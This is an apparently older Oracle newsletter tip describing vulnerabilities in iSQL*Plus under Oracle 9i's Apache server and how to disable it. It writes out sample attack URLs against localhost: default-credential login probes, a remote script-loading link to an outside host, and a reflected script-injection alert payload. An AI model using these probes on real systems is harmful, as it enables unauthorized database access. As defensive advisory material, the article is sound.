Security

Oracle Tip: Beware of iSQL*Plus vulnerabilities

Many security agencies recently reported several vulnerabilities with the Apache HTTP server that comes with Oracle 9i. Depending on your environment, you may want to disable iSQL*Plus to prevent exploits against this vulnerability.

This article originally appeared in the Oracle e-newsletter. Click here to subscribe automatically.

iSQL*Plus is a small HTML Web interface front-end that uses SQL*Plus as the backend. It was intended as a way of easily generating HTML reports through a Web service using existing SQL*Plus scripts. By default, iSQL*Plus is installed (and enabled) along with the Apache HTTP server that comes with Oracle 9i.

Many security agencies recently reported several vulnerabilities with this server. Depending on your environment, you may want to disable iSQL*Plus to prevent exploits against this vulnerability.

First, check to see if iSQL*Plus is running. Try entering the URL http://<hostname>:<port>/isqlplus ..., where <hostname> is the name or IP address of the host with Oracle 9i HTTP server installed and <port> is the port number the server is listening on, which is 80 by default. For example, on my Windows machine with a fresh Oracle 9i installation, I would enter http://127.0.0.1/isqlplus. If you get a page with login fields, then you have iSQL*Plus installed and running. You should consider the vulnerability issues before allowing it to run on your machine.

The first vulnerability is the buffer overflow problem. If hackers can access the main page, they can send a very long input to username and password and overflow into the stack and return address. A knowledgeable hacker can run arbitrary code within the security context of the Apache server, such as "SYSTEM" under Windows or "oracle" under UNIX. Oracle already addressed this issue by providing a downloadable patch (with issue number 2581911) at OracleMetaLink. The patch for this problem doesn't seem to be available in any default versions so far.

A second vulnerability is the fact that this screen exists at all. It's an opportunity for someone with access to your Web site to test which username/password combinations are valid on your database. For instance, I could test http://127.0.0.1/isqlplus?userid=scott/tiger and http://127.0.0.1/isqlplus?userid=system/manager. If I get in using a database account, I can access any table in the database, provided I know the name.

A third vulnerability is the fact that iSQL*Plus can open a script via the URL, creating the possibility of creating cross-site vulnerabilities. For example, if I get a user to click on the link http://127.0.0.1/isqlplus?userid=scott/tiger&script=http://192.168.168.244/foo.pl, my Web server, which contains the Perl script foo.pl, can pass back a valid SQL script to run against your database. But I could also receive all the HTTP header information from your server's Web site requesting the document.

Another vulnerability in iSQL*Plus is due to the fact that the iSQL*Plus runs JavaScript in the page, which can be intercepted to run arbitrary JavaScript code. For an example from the official alert, try typing the URL http://127.0.0.1/isqlplus?action=<script>alert('This%20could%20have%20been%20a%20hacker')</script> into a JavaScript browser. You should see an error in the page and a pop-up alert box.

Unless you have a specific need for iSQL*Plus, and your Web site running Oracle's Apache server is completely secure, I recommend that you disable iSQL*Plus and use the command line or Windows version of SQL*Plus. To disable iSQL*Plus, you can simply comment out the following line from the oracle_apache.conf file that should reside in ?/Apache/Apache/conf:

include "<oracle home>/sqlplus/admin/isqlplus.conf"

You should replace the <oracle home> in this code with your actual Oracle Home directory. If you really need to use iSQL*Plus, you should at least consider hiding the usual configuration. If you try to search for "isqlplus" on a search engine, you may see a couple of people who had their /isqlplus directory listed. You can change the directory that is mapped to iSQL*Plus in the isqlplus.conf file listed above.

Scott Stephens worked for Oracle for more than 13 years in technical support, e-commerce, marketing, and software development. For more of his Oracle tips, visit our Oracle Dev Tips Library.

Editor's Picks